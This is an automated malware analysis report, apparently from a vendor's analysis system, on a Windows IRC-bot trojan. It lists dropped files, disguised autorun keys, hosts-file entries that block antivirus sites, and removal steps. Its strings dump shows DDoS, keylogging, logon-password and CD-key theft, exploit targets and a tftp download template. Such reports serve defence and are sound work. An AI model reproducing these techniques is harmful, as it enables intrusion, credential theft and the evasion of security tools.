HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.MSIL.Androm.3 (B) (Emsisoft), Gen:Heur.MSIL.Androm.3 (AdAware), Rbot.YR, BackdoorIRC.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, IRCBot
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 49ee5b907e4b4b9d5aa0669d261f996b
SHA1: 6a05c73f19c6866da64a7d10b8e8593b70d85688
SHA256: e59820f41e2938495b4241d0832a432c432a4eea7a0c8ab35ba7a4d8767398b3
SSDeep: 12288:xD/Q56oYjW4ftG9 4UWMqBOgxnZKE1Xvvgf5UjzX:xD/5oYK4Es4UWMqVxnZr4f5sX
Size: 979039 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2011-04-25 19:48:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
IRCBot | A bot can communicate with command and control servers via IRC channel. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224
The Trojan injects its code into the following process(es):
LOIC.exe:1316
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
The process eohpsgi.exe:1660 makes changes in the file system.
The Trojan deletes the following file(s):
The process run.exe:1388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)
The process Uncrypted.exe:224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
Registry activity
The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 AA DB 59 AA 83 B2 0D E3 86 81 DE 94 73 5D 5E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uncrypted.exe" = "Uncrypted"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"LOIC.exe" = "Low Orbit Ion Cannon"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The process eohpsgi.exe:1660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 09 F4 E3 AE 09 AE E3 6C 56 4C 61 12 CC 83 A4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process LOIC.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 8D 73 0C C0 DB 47 C3 A5 75 11 7D 86 3A 9E 45"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process run.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F F9 04 63 DA B1 E3 BA 55 2F 7F 5A BD 98 AA B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process Uncrypted.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 5D C0 A2 A7 B7 24 11 7A 37 DD C9 D1 2B C3 7E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Run.exe" = "run"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies the IE security-zone settings so that all local web nodes with no dots that do not belong to any zone are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:
"IntranetName" = "1"
Dropped PE files
MD5 | File path |
---|---|
9dbe2c1a0f3360af6a9e24b2b303113d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\LOIC.exe |
363307d3a54e1c2d1107b1f53e8844b1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uncrypted.exe |
2e31f43c4028cf8520dca20a9cb8e55d | c:\WINDOWS\system32\eohpsgi.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to translate DNS names to IP addresses. The modified file is 1122 bytes in size. The following entries are added to the hosts file:
IP address | Hostname |
---|---|
127.0.0.1 | virustotal.com |
127.0.0.1 | mcafee.com |
127.0.0.1 | avira.com |
127.0.0.1 | avast.com |
127.0.0.1 | symantec.com |
127.0.0.1 | clamwin.com |
127.0.0.1 | kaspersky.com |
127.0.0.1 | comodo.com |
127.0.0.1 | norton.com |
127.0.0.1 | avg.com |
127.0.0.1 | novirusthanks.org |
127.0.0.1 | virusscan.jotti.org |
127.0.0.1 | viruschief.com |
127.0.0.1 | fortiguard.com |
127.0.0.1 | bitdefender.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1756
eohpsgi.exe:1660
run.exe:1388
Uncrypted.exe:224
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\LOIC.exe (133 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uncrypted.exe (3878 bytes)
%System%\drivers\etc\hosts (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYZG96R\desktop.ini (67 bytes)
%System%\eohpsgi.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85IF8HAJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\7IQEU6O0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LTNDDR8Y\desktop.ini (67 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Microsoft Update Machine" = "eohpsgi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine" = "eohpsgi.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 0.0.0.0
Legal Copyright:
Legal Trademarks:
Original Filename: test-new1.exe
Internal Name: test-new1.exe
File Version: 0.0.0.0
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 963812 | 966656 | 5.0059 | e7c9c24e1ce22d4d81c0915e48e87b42 |
.rsrc | 974848 | 680 | 4096 | 0.476044 | 89bbd7bcd3f28ac346308cdebc72b7f0 |
.reloc | 983040 | 12 | 4096 | 0.011373 | b061c1f6fd5cfb56674648657757dc87 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
eohpsgi.exe_1660:
.text
.text
`.rdata
`.rdata
@.data
@.data
.idata
.idata
.reloc
.reloc
Invalid allocation size: %u bytes.
Invalid allocation size: %u bytes.
Client hook allocation failure at file %hs line %d.
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
_CrtIsValidHeapPointer(pUserData)
Allocation too large or negative: %u bytes.
Allocation too large or negative: %u bytes.
Client hook re-allocation failure at file %hs line %d.
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: after %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
DAMAGE: before %hs block (#%d) at 0xX.
memory check error at 0xX = 0xX, should be 0xX.
memory check error at 0xX = 0xX, should be 0xX.
%hs located at 0xX is %u bytes long.
%hs located at 0xX is %u bytes long.
%hs allocated at file %hs(%d).
%hs allocated at file %hs(%d).
DAMAGE: on top of Free block at 0xX.
DAMAGE: on top of Free block at 0xX.
Bad memory block found at 0xX.
Bad memory block found at 0xX.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0xX, subtype %x, %u bytes long.
crt block at 0xX, subtype %x, %u bytes long.
normal block at 0xX, %u bytes long.
normal block at 0xX, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
client block at 0xX, subtype %x, %u bytes long.
%hs(%d) :
%hs(%d) :
#File Error#(%d) :
#File Error#(%d) :
Data: %s
Data: %s
%s(%d) : %s
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
Second Chance Assertion Failed: File %s, Line %d
user32.dll
user32.dll
Debug %s!
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
Program: %s%s%s%s%s%s%s%s%s%s%s
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
portuguese-brazilian
portuguese-brazilian
ntpass
ntpass
NTPass
NTPass
mssql
mssql
MSSQL
MSSQL
%s: %d,
%s: %d,
Total: %d in %s.
Total: %d in %s.
[SCAN]: Current IP: %s.
[SCAN]: Current IP: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Server started on Port: %d, File: %s, Request: %s.
[TFTP]: Failed to start server, error: .
[TFTP]: Failed to start server, error: .
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.
[HTTPD]: Failed to start server, error: .
[HTTPD]: Failed to start server, error: .
%d.%d.%d.%d
%d.%d.%d.%d
sendto() socket failed. sent = %d .
sendto() socket failed. sent = %d .
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: IP: %s, Port %d is open.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.
[SCAN]: Failed to start worker thread, error: .
[SCAN]: Failed to start worker thread, error: .
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
[SCAN]: Finished at %s:%d after %d minute(s) of scanning.
%d. %s = %s
%d. %s = %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
CDKey
CDKey
prvkey
prvkey
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
Microsoft Windows Product ID
Microsoft Windows Product ID
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Global Operations
Global Operations
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Techland\Chrome
Software\Techland\Chrome
Chrome
Chrome
base\mp\sof2key
base\mp\sof2key
nwncdkey.ini
nwncdkey.ini
Key1=
Key1=
Key2=
Key2=
Key3=
Key3=
%s\%s
%s\%s
%s CD Key: (%s).
%s CD Key: (%s).
DCC SEND %s %i %i %i
DCC SEND %s %i %i %i
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).
\\%s\pipe\epmapper
\\%s\pipe\epmapper
[TFTP]: File transfer complete to IP: %s
[TFTP]: File transfer complete to IP: %s
[%s]: Exploiting IP: %s.
[%s]: Exploiting IP: %s.
w[TFTP]: File transfer complete to IP: %s
w[TFTP]: File transfer complete to IP: %s
ddos.syn
ddos.syn
ddos.ack
ddos.ack
ddos.random
ddos.random
[DDoS]: Send error: .
[DDoS]: Send error: .
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: Couldn't open file: %s.
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: File download: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Update: %s (%dKB transferred).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: Filesize is incorrect: (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: CRC Failed (%d != %d).
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Opened: %s.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Update failed: Error executing file: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[DOWNLOAD]: Bad URL, or DNS Error: %s.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): Failed to stat, device not ready.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[MAIN]: %s Drive (%s): %s total, %s free, %s available.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Searching for file: %s.
[FINDFILE]: Files found: %d.
[FINDFILE]: Files found: %d.
Found: %s\%s
Found: %s\%s
NTDLL.DLL
NTDLL.DLL
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(no password)).
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find the password in memory.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Unable to find Winlogon Process ID.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Failed to enable Debug Privilege.
[FINDPASS]: Only supported on Windows NT/2000.
[FINDPASS]: Only supported on Windows NT/2000.
MSGINA
MSGINA
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/%S).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(N/A)).
[FINDPASS]: The Windows logon (Pid: ) information is: Domain: \\%S, User: (%S/(N/A)).
[HTTPD]: Error: server failed, returned: .
[HTTPD]: Error: server failed, returned: .
HTTP/1.0 200 OK
HTTP/1.0 200 OK
Content-Type: %s
Content-Type: %s
Date: %s %s GMT
Date: %s %s GMT
Last-Modified: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Expires: %s %s GMT
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Worker thread of server thread: %d.
[HTTPD]: Failed to start worker thread, error: .
[HTTPD]: Failed to start worker thread, error: .
PRIVMSG %s :Searching for: %s
PRIVMSG %s :Searching for: %s
Index of %sIndex of %sIndex of %s
Index of %s
Name
Name
Last Modified
Last Modified
Size
Size
Searching for: %s
Searching for: %s
Parent Directory
Parent Directory
%2.2d/%2.2d/M %2.2d:%2.2d %s
%2.2d/%2.2d/M %2.2d:%2.2d %s
PRIVMSG %s :%-31s %-21s
PRIVMSG %s :%-31s %-21s
%s%s/
%s%s/
">%s/
">%s/
%s
%s
-
-
PRIVMSG %s :%-31s %-21s (%s bytes)
PRIVMSG %s :%-31s %-21s (%s bytes)
">%s
">%s
%dk
%dk
PRIVMSG %s :Found %s Files and %s Directories
PRIVMSG %s :Found %s Files and %s Directories
%s %s HTTP/1.1
%s %s HTTP/1.1
Referer: %s
Referer: %s
Host: %s
Host: %s
[ICMP]: Error: socket() failed, returned: .
[ICMP]: Error: socket() failed, returned: .
[ICMP]: Error: setsockopt() failed, returned: .
[ICMP]: Error: setsockopt() failed, returned: .
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: .
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[IDENTD]: Client connection from IP: %s:%d.
[IDENTD]: Client connection from IP: %s:%d.
: USERID : UNIX : %s
: USERID : UNIX : %s
[IDENTD]: Error: server failed, returned: .
[IDENTD]: Error: server failed, returned: .
PRIVMSG
PRIVMSG
%s %s :%s
%s %s :%s
[%d-%d-%d %d:%d:%d] %s
[%d-%d-%d %d:%d:%d] %s
[KEYLOG]: %s
[KEYLOG]: %s
%s (Changed Windows: %s)
%s (Changed Windows: %s)
%s (Buffer full) (%s)
%s (Buffer full) (%s)
%s (Return) (%s)
%s (Return) (%s)
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
GetAsyncKeyState
GetAsyncKeyState
GetKeyState
GetKeyState
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
gdi32.dll
gdi32.dll
ws2_32.dll
ws2_32.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
InternetOpenUrlA
InternetOpenUrlA
InternetCrackUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
icmp.dll
icmp.dll
netapi32.dll
netapi32.dll
dnsapi.dll
dnsapi.dll
iphlpapi.dll
iphlpapi.dll
mpr.dll
mpr.dll
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
odbc32.dll
odbc32.dll
SQLDriverConnect
SQLDriverConnect
SQLSetEnvAttr
SQLSetEnvAttr
SQLExecDirect
SQLExecDirect
SQLAllocHandle
SQLAllocHandle
SQLFreeHandle
SQLFreeHandle
SQLDisconnect
SQLDisconnect
avicap32.dll
avicap32.dll
Kernel32.dll failed.
Kernel32.dll failed.
User32.dll failed.
User32.dll failed.
Advapi32.dll failed.
Advapi32.dll failed.
Gdi32.dll failed.
Gdi32.dll failed.
Ws2_32.dll failed.
Ws2_32.dll failed.
Wininet.dll failed.
Wininet.dll failed.
Icmp.dll failed.
Icmp.dll failed.
Netapi32.dll failed.
Netapi32.dll failed.
Dnsapi.dll failed.
Dnsapi.dll failed.
Iphlpapi.dll failed.
Iphlpapi.dll failed.
Mpr32.dll failed.
Mpr32.dll failed.
Shell32.dll failed.
Shell32.dll failed.
Odbc32.dll failed.
Odbc32.dll failed.
Avicap32.dll failed.
Avicap32.dll failed.
Windows for Workgroups 3.1a
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
tftp -i %s get %s
tftp -i %s get %s
\\%s\ipc$
